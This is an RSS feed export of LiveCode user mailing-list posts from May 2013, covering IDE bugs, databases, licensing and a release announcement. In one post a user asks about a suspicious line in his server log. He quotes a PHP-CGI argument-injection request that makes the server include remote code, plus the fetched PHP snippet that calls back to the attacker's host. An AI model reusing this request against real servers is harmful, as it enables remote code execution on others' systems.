<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:syn="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/">
  <channel rdf:about="http://blog.gmane.org/gmane.comp.ide.revolution.user">
    <title>gmane.comp.ide.revolution.user</title>
    <link>http://blog.gmane.org/gmane.comp.ide.revolution.user</link>
    <description/>
    <syn:updatePeriod>hourly</syn:updatePeriod>
    <syn:updateFrequency>1</syn:updateFrequency>
    <syn:updateBase>1901-01-01T00:00+00:00</syn:updateBase>
    <items>
      <rdf:Seq>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187491"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187486"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187484"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187466"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187464"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187462"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187451"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187446"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187445"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187441"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187437"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187390"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187385"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187378"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187362"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187359"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187337"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187329"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187314"/>
        <rdf:li rdf:resource="http://comments.gmane.org/gmane.comp.ide.revolution.user/187308"/>
      </rdf:Seq>
    </items>
    <image rdf:resource="http://gmane.org/img/gmane-25t.png"/>
    <textinput rdf:resource=""/>
  </channel>
  <image rdf:about="http://gmane.org/img/gmane-25t.png">
    <title>Gmane</title>
    <url>http://gmane.org/img/gmane-25t.png</url>
    <link>http://gmane.org</link>
  </image>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187491">
    <title>Dictionary woes</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187491</link>
    <description>&lt;pre&gt;Everybody should be really glad that
the dictionary problem that occurred with 6.0.1
seems to have been sorted out.

Richmond.

_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Richmond</dc:creator>
    <dc:date>2013-05-25T19:45:20</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187486">
    <title>Installing 6.0.2 OSS</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187486</link>
    <description>&lt;pre&gt;I have just installed LC 6.0.2 OSS on Ubuntu 8.04.3

"So what?" I hear you say.

Because that Ubuntu 8.04 was running on a Pentium III
with 256 MB RAM.

"So what? How long is Richmond going to wibble on in this vein?"

A LONG TIME Because the Open Source Version of Livecode
is all about empowering many people who do not have
buckets of moolah to run fancy right-up-to-date machines.

Oh, and, while I'm here: I connected my favourite monitor
of all time that I fished out of a dumpster in front of a
supermarket in Scotland 9 years ago.

Richmond.

_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Richmond</dc:creator>
    <dc:date>2013-05-25T19:09:37</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187484">
    <title>thinking through parsing multi-line database commands with cr in thedata</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187484</link>
    <description>&lt;pre&gt;I'm still kind of thinking aloud on this, and don't want to shoot my foot
clean off.

I'm developing with the ipad version in mind for the future, too.

My preferred db will be postgres, with mysql as an alternate (if I don't
keep tripping across it's "whoops!"s).  However, for performance reasons
(as well as the demo &amp;amp; single use versions working without having to
install a db server!), it will be necessary to support sqlite as well,
keeping the local db.

I'm writting a wrapper to take multiple commands, and possibly an
update/sync command, which could be to the table in the same or another db.

If I'm feeding postgres/mysql, I can have a begin/update this/insert
that/commit sequence, no problem.

SQLite, though, seems to have at least sporadic issues with multi-line
command blocks, and may need them sent one at a time.

What I'm scratching my brain for is "unpeeling" a multi-command block where
the data will usually include cr.

All I'm coming up with so far is putting a line in, and testing for things
like "INSERT INTO" "UPDATE" and any other command I use on the next line to
see if it is indeed a new line, and otherwise appending to the current
working line.

But this will trip up on, for example, an address like:

   Joe Scmoe, President
   Update your mac!
   123 E. Main St.


Or am I (hopefully) missing an obvious solution (other than dump sqlite :)


&lt;/pre&gt;</description>
    <dc:creator>Dr. Hawkins</dc:creator>
    <dc:date>2013-05-25T17:49:52</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187466">
    <title>Reading the battery charge of an IOS device</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187466</link>
    <description>&lt;pre&gt;Does anyone know of a way to read the percentage of charge in the battery
of an IOS device?

TIA

&lt;/pre&gt;</description>
    <dc:creator>Howard Bornstein</dc:creator>
    <dc:date>2013-05-24T20:34:40</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187464">
    <title>How to get an off-line licence for LC OSS</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187464</link>
    <description>&lt;pre&gt;Install LC OSS (whatever version) on your Operating System of choice, 
and register it online
with your code.

Close LiveCode and look here:

Windows XP: C:/Documents
and Settings/*username*/Application Data/RunRev/Licenses

Windows Vista- C:/Documents and Settings/Administrator/Application
Data/RunRev/Licenses

Windows 7 - C:\Documents and Settings\*username*\AppData\Roaming\RunRev\Licenses

Windows 8 - C:/Users/*username*/AppData/Roaming/RunRev

Mac- Library/Application Support/Runrev/Licenses

Linux- ~/.runrev/licenses


and you should see the licence file (or several).

Copy the thing and use it on any machines that are not internet connected.

Richmond.


_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Richmond</dc:creator>
    <dc:date>2013-05-24T18:38:30</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187462">
    <title>RELEASE: LiveCode 6.0.2 RC1</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187462</link>
    <description>&lt;pre&gt;Dear Use List,

We're please to announce LiveCode 6.0.2 RC1.

This is the first build of our first maintenance release cycle. For those
who are not familiar with the new process please see the 'release process'
section of our contributing to LiveCode document which can be found here:

http://livecode.com/community/contribute-to-livecode/# Release Process

The following bugs have been fixed in this release:

8884 “the properties” missing items.
10794 Flagged chars affect visited color of links.
10849 RevBrowser missing from LiveCode Community edition.
10863 Group command doesn't throw an error when grouping shared groups.
10878 Setting the tabWidths causes crashes.
10897 Exporting snapshot from rounded rectangles adds artefacts.
10905 The htmlText uses “super” instead of “sup.
10908 The flaggedRanges reports an incorrect values when used with link
text. 10910 Crash when using crop command.
10856 - Android answer dialogs displayed on app termination prevent app
from restarting correctly.
10880 – Creating multiline native fields crashes iOS 6 simulator and
devices.
10895 – Use of deprecated iOS API prevents submission of apps to iTunes
store.

A great way to contribute to the stability of maintenance releases is to
test these release candidates.

The best way to do this is to make a copy of a production project and open
it in this edition. Try out critical aspects of your app in the IDE and on
devices (if applicable) and report back any issues to us via the quality
control center (quality.runrev.com).

Downloads are available at:
http://downloads.livecode.com/livecode/6_0_2/

Thanks for your support.

Warm regards,

The LiveCode Team
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Benjamin Beaumont</dc:creator>
    <dc:date>2013-05-24T17:43:28</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187451">
    <title>AnimationEngine pending messages</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187451</link>
    <description>&lt;pre&gt;I am having trouble canceling the pending messages that are built up with use of AE in my mobile app. I have a series of AE commands on card open but want to stop them all when moving to a new card. Even in the IDE with the pending messages/message box open I can only delete one line of the pending messages and then a new message keeps coming after a bit. Is there a way to absolutely stop ALL of them that I am missing?

I am trying this in my openCard handler but they still seem to stack up.
   put the pendingmessages into tPendingMsgs
     repeat for each line x in tPendingMsgs
          cancel item 1 of x
     end repeat

Thanks

Tom

&lt;/pre&gt;</description>
    <dc:creator>Thomas McGrath III</dc:creator>
    <dc:date>2013-05-24T15:34:15</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187446">
    <title>How to navigate within a text field?</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187446</link>
    <description>&lt;pre&gt;Hello,

I have a text field with a small directory at the beginning and several
chapters. I would like the user to navigate within the text like in HTML
with text marks, clicking on a directory headline brings him to the
beginning of the selected chapter. I could use the linktext property, but I
am missing a target property as a "text mark" and a "go" to it. (without
using HTML and a browser)

Is there a better approach as putting each chapter in a separate field and
showing and hiding each field with selecting one of the linktexts in the
directory? I think there must be a more suitable way to handle this
behavior.

Any hints?

Thank you

Tiemo

 

_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Tiemo Hollmann TB</dc:creator>
    <dc:date>2013-05-24T12:13:18</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187445">
    <title>is anyone using FieldTrip Rich Text Editor</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187445</link>
    <description>&lt;pre&gt;Hi,

is anyone on list using FieldTrip and would like to answer me some questions about the usage?

Right now i am experiencing some strange behaviour:
1. ftplaceToolbar places the toolbar and a field to the stack 
2. sometimes the toolbar suddenly grays out and is not responsive anymore (IDE and standalone)

Is it just me or is anyone else noticing that behaviour?

Did you manage to place only some of the FieldTrip buttons(e.g. size, bold, italic, underline)
to the stack instead of the whole toolbar?

Regards,

Matthias


_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Matthias Rebbe</dc:creator>
    <dc:date>2013-05-24T11:56:38</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187441">
    <title>[OT] server log entry?</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187441</link>
    <description>&lt;pre&gt;Hi,

Can someone could help me to understand one of my server log?


Here is the line:

193.107.17.36 ... "GET
/?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://
gofastdownload.com/rf/s.txt HTTP/1.1" 200 6027 "-" "Python-urllib/2.6"

The file ../rf/s.txt  contains:

&amp;lt;?php file_get_contents('
http://gofastdownload.com/rf/s.php?d='.$_SERVER['HTTP_HOST']); exit(0); ?&amp;gt;

The IP point in the middle of nowhere in Russia.

and finally I know nothing about php.

Thanks for any hints,

Regards,

Thierry

------------------------------------------------
Thierry Douez - http://sunny-tdz.com
Maker of sunnYperl - sunnYmidi - sunnYmage
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Thierry Douez</dc:creator>
    <dc:date>2013-05-24T09:16:28</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187437">
    <title>Weird glitch in breakpoint behavior</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187437</link>
    <description>&lt;pre&gt;I was testing a 6.0.1 stack when "Step into next statement" after a manual breakpoint acted like a 'Continue" ... meaning it didn't stop until the end of the script.  I was able to recreate the problem repeatedly, so I began to whittle down my script to find what caused the glitch.  In so doing, I checked various preference settings to see what might have caused the weird glitch.

I kept whittling away until there wasn't much left in my script, so I finally decided to start from scratch with an entirely new app.  It happened again with a do-nothing script.

Recipe:
1) Put the following simple script into a button's mouseUp script in a new app.
2) Set breakpoints manually on lines 2 and 4.
3) Click the button.  It stops on line 2, as expected.
4) Click on Edit/Preferences in the LiveCode menu
5) The app runs to the hardcoded breakpoint on line 6

First of all, it shouldn't have run when I merely opened the preferences dialog.
Secondly, it missed the manual breakpoint on line 4

OK, so like a good little developer, I tried the same script in a backleveled version (5.5.1) to see if recent LiveCode updates created the problem.  That's the most likely scenario, right?

Nope.  I got the same results.  Apparently this weird glitch has been around since today's pebbles were large boulders.

Lots of testing later ...

There were *some* instances of opening the preferences dialog that didn't cause the problem.  And, selecting individual preference items didn't cause the problem.

However, EVERY time I selected the "Updates" preference item, the script "Continue"d.

Yeah, I know. The doctors says if it hurts, then don't do that.  OK, so I won't open the Preferences dialog and test for "Updates" during debugging sessions.

However ...

This weird glitch *might* be related in some bizarre manner to prior (seemingly) random and unrecreatable weird glitches I have had with breakpoint executions.  The good news (I think) is this time I was able to recreate and isolate the weird glitch.

Well, I isolated *a* weird glitch.  Whether it is related to my *original* weird glitch, I don't know.

The original weird glitch with my app would sometimes (randomly?) get triggered by simply clicking on the "up arrow" in the Variables display of the IDE.  Is a keystroke being passed through the hierarchy into the app when it shouldn't be?  Unknown.  The (random?) up arrow weird glitch happened only in 6.0.1, so it's possible that particular weird glitch occurred because of recent updates to LiveCode.

In addition to the above weirdness, the same preferences weird glitch is recreatable in 6.0.1 by clicking on Tools/Project Browser.  Am I more likely to open the Project Browser during debugging than I am likely to open the Preferences dialog?  Ubetcha.

Again, is this preferences/browser dialog weird glitch related to my original weird glitch?  Heck if I know.  It's just plain weird.

Hopefully this exercise will help others who have experienced (seemingly) random weird glitches with breakpoints in the past.  It's possible all those weird glitches could have a common thread, so fixing this *recreatable* weird glitch could solve all those other weird glitches at the same time.

I suppose I could be the ONLY poor soul who has experienced weird glitches with breakpoints, but I doubt it.

Did I mention it was a weird glitch?

Simple Script:
on mouseUp
   put empty into tGarbage1 -- once
   put empty into tGarbage2 -- twice
   put empty into tGarbage3 -- three times
   put empty into tGarbage4 -- a lady
   breakpoint
end mouseUp

TED
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Terry Dennis</dc:creator>
    <dc:date>2013-05-24T04:34:09</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187390">
    <title>JSON</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187390</link>
    <description>&lt;pre&gt;I have a server project where I need to send some JSON to a URL. I've never done this before. Has anyone got a simple example/explanation of how this is achieved?

Thanks in advance.

Tom

&lt;/pre&gt;</description>
    <dc:creator>Thomas McGrath III</dc:creator>
    <dc:date>2013-05-23T19:45:02</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187385">
    <title>Data From MySQL to SQLite</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187385</link>
    <description>&lt;pre&gt;Hi all,

I have an ongoing need to populate some SQLite tables with data stored in a MySQL database. The parallel table structures in both db systems are created; I just need to move the data. I can figure out how to write the queries, but before I spend a lot of time I thought I'd check to see if any libraries already exist for this. Anyone done this already?

Thanks,

Devin
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Devin Asay</dc:creator>
    <dc:date>2013-05-23T19:31:23</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187378">
    <title>Continuing a script after cloning a stack</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187378</link>
    <description>&lt;pre&gt;I have a script that clones a substack, followed by some other commands to
rename the cloned substack and set it's mainstack.  As soon as the clone
command is issued, control passes to the cloned stack and the rest of my
script is ignored.

That's pretty much expected behavior but I'm wondering if there are any
tricks that would allow my script to continue processing or perhaps some
other method of duplicating a stack.  I tried copying the stack to the
clipboard followed by a paste but control passed to the new
stack immediately after the paste.


Pete
lcSQL Software &amp;lt;http://www.lcsql.com&amp;gt;
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Peter Haworth</dc:creator>
    <dc:date>2013-05-23T19:12:00</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187362">
    <title>mApp Framework problems</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187362</link>
    <description>&lt;pre&gt;G'day all

Am starting to use Monte's mApp framework and have run into a couple of problems:

1. Added a datagrid and this works and displays fine on normal resolution displays but on Retina displays for iPhone + iPad nothing is displayed. Seems sort of strange - just want to check if anyone else has done this ok or not?

2. In testing/playing further, I now seem to have mucked something else up - am certainly getting some unexpected behaviour (Think this error came up after deleting a datagrid from one of the cards in the UI stack, though there are still datagrids on other cards) . When I now open the mainstack or try testing on the simulator, what had previously worked now gives me the error

"Could not find stack"

This error comes from the mApp framework - I can see the code and see that the property (added by the framework)

mAppProps["UIStack"]

of my main UI stack is empty, thus resulting in this error. Strange.

If anyone has ideas I'm keen to learn... or else I'll start again and see if I can somehow replicate. 

Thanks for any help!

cheers

Alan :-)

p.s. Very much looking forward to that high-priority item on the development list - the beer machine!

--
Alan Stenhouse
alanstenhouse-PkbjNfxxIARBDgjK7y7TUQ&amp;lt; at &amp;gt;public.gmane.org

Check out our apps on the App Store:

BeatSpeak - the multilingual talking metronome;
EV-Point - Find your nearest Electric Vehicle Recharge Station.


_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Alan Stenhouse</dc:creator>
    <dc:date>2013-05-23T15:53:09</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187359">
    <title>[ON-REV] by the way what happened to on-rev ftp editor?</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187359</link>
    <description>&lt;pre&gt;• Last week, on opening on-rev editor version 2 (latest?!) i got a msg kind
of "a new version is on the way.. just.. go and get a pint of beer!" set of!
(actually there was new download link but did not work)

• Today the editor just freezes (wanted to try an alternative upload to
interarchy), no beer! no more msg.





--
View this message in context: http://runtime-revolution.278305.n4.nabble.com/ON-REV-by-the-way-what-happened-to-on-rev-ftp-editor-tp4665299.html
Sent from the Revolution - User mailing list archive at Nabble.com.

_______________________________________________
use-livecode mailing list
use-livecode&amp;lt; at &amp;gt;lists.runrev.com
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode&lt;/pre&gt;</description>
    <dc:creator>Robert Mann</dc:creator>
    <dc:date>2013-05-23T15:04:30</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187337">
    <title>Can I set the linktext with the editor?</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187337</link>
    <description>&lt;pre&gt;Hello,

I know, how to set the textstyle "link" and the linktext by script, but
don't succeed in setting it manually in the property editor of a field. I
can't even select a single word or text chunk of a field with the pointer
tool. It seems that I have never had the need of it up to now.

How can I set links in a text field manually? What am I missing?

Thanks

Tiemo

 

 

 

_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Tiemo Hollmann TB</dc:creator>
    <dc:date>2013-05-23T09:15:02</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187329">
    <title>Random sort demonstration</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187329</link>
    <description>&lt;pre&gt;This script demonstrates what is going on with random sorts of short lists using this:

      sort items of myVar by random( the number of items of myVar)

This is a button script on a stack with a wide field with a scrollbar.

local lineAssignments

on mouseUp
   set the cursor to watch
   put empty into field 1
   put "a,b,c" into original
   put 0 into numFirstSame
   put 100 into trials
   repeat trials times
      put original into myVar
      put empty into lineAssignments
      sort items of myVar by randomLog( the number of items of myVar, each)
      delete char -1 of lineAssignments
      put "(" &amp;amp; original &amp;amp; ") is assigned (" &amp;amp; lineAssignments &amp;amp; ") and sorted as (" &amp;amp; myVar &amp;amp; ") where the" after field 1
      if  (item 1 of original) is (item 1 of myVar) then
         put " first is same" after field 1
         add 1 to numFirstSame
      else
         put " first is different" after field 1
      end if
      put return after field 1
   end repeat
   put round( (numFirstSame/trials) * 100) into percentSame
   put "The first was the same " &amp;amp; percentSame &amp;amp; "% of the time" after field 1
   set the scroll  of field 1 to 999999
end mouseUp

function randomLog pRange, pEach
   get random(pRange)
   put pEach &amp;amp; "-&amp;gt;" &amp;amp; it &amp;amp; comma after lineAssignments
   return it
end randomLog

Note that this uses function randomLog() instead of random() so the assignments can be gleamed.

These are the last few lines of a typical output:

(a,b,c) is assigned (a-&amp;gt;3,b-&amp;gt;2,c-&amp;gt;2) and sorted as (b,c,a) where the first is different
(a,b,c) is assigned (a-&amp;gt;1,b-&amp;gt;2,c-&amp;gt;2) and sorted as (a,b,c) where the first is same
(a,b,c) is assigned (a-&amp;gt;1,b-&amp;gt;2,c-&amp;gt;1) and sorted as (a,c,b) where the first is same
(a,b,c) is assigned (a-&amp;gt;2,b-&amp;gt;2,c-&amp;gt;3) and sorted as (a,b,c) where the first is same
The first was the same 53% of the time

I got percentages in the range 45% to 60%.  My theory (other email) predicted 52 percent.  You can try upping the number of trials and commenting out the per-sort lines, and see what you get.

The problem is equality in the sort.  It keeps the same order in comparison of pairs of items.  For example, the items sorted in the last case above as though they were 2,2,3.  The first item is still first.  

So...

Use large values for the argument to random() in random sorts.

Dar







_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Dar Scott</dc:creator>
    <dc:date>2013-05-23T06:08:15</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187314">
    <title>Datagrid - reference an image in a column that's stored in a database</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187314</link>
    <description>&lt;pre&gt;I have a datagrid.  Using a MySQL database.  In one field of the database
I'm storing the image link
example:  http://forums.runrev.com/styles/prosilver/imageset/site_logo.gif

How do I go about showing that image in a column of my datagrid?  For
instance if I have a column called colPic how would I show the above
reference image?

Been stumped on this for hours.
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Shawn Blc</dc:creator>
    <dc:date>2013-05-23T00:29:32</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187308">
    <title>Android splash screens</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187308</link>
    <description>&lt;pre&gt;From what I can make out in the Android release notes, splash images only relate to the personal and educational versions of Livecode. However, there is still a field for a splash image in the android panel of the standalone builder of the Livecode commercial version.

I'd like to include a splash image as my app takes a little while to start up and a few seconds of black screen isn't a particularly good look but there doesn't seem to be much (any?) information on what size this image should be and how to adapt it for different sized devices and screens.The release notes mention using a square 600 x 600 pixel image, but this is for display on a Livecode branded splash screen using the personal and educational version. What about for the commercial version?

Terry...

Dr Terry Judd
Senior Lecturer in Medical Education
Medical Eduction Unit
Faculty of Medicine, Dentistry &amp;amp; Health Sciences
The University of Melbourne



_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Terry Judd</dc:creator>
    <dc:date>2013-05-22T23:31:54</dc:date>
  </item>
  <item rdf:about="http://comments.gmane.org/gmane.comp.ide.revolution.user/187298">
    <title>Unexpected scrollbarDrag message</title>
    <link>http://comments.gmane.org/gmane.comp.ide.revolution.user/187298</link>
    <description>&lt;pre&gt;I have a card with a number of slider scrollbars on it and a scrollbarDrag
handler in the card script to deal what happens when any of the sliders are
moved.  I also have a field associated with each scrollbar which receives
the thumbpos of its associated slider.  All that works fine

However, if I click into the slider value field, my card level
scrollbardrag message is triggered with a value of 1.  I also see that the
message is coming from the value field.

If I get rid of the scrollbardrag message at the card level and put it into
the script of each individual slider, the problem goes away.  If I put a
scrollbardrag handler into the script of the value fields, it is triggered
as soon as I click into the field.

The value fields do not have any scrollbars enabled, do not have a behavior
script, and there are no other scripts in the messagepath between them and
the card.

I'm sure this is not an intended behavior?


Pete
lcSQL Software &amp;lt;http://www.lcsql.com&amp;gt;
_______________________________________________
use-livecode mailing list
use-livecode-1W37MKcQCpJ21N0xZs15Ng&amp;lt; at &amp;gt;public.gmane.org
Please visit this url to subscribe, unsubscribe and manage your subscription preferences:
http://lists.runrev.com/mailman/listinfo/use-livecode

&lt;/pre&gt;</description>
    <dc:creator>Peter Haworth</dc:creator>
    <dc:date>2013-05-22T22:32:43</dc:date>
  </item>
  <textinput rdf:about="http://search.gmane.org/?group=$group=gmane.comp.ide.revolution.user">
    <title>Search Engine</title>
    <description>Search the mailing list at Gmane</description>
    <name>query</name>
    <link>http://search.gmane.org/?group=$group=gmane.comp.ide.revolution.user</link>
  </textinput>
</rdf:RDF>
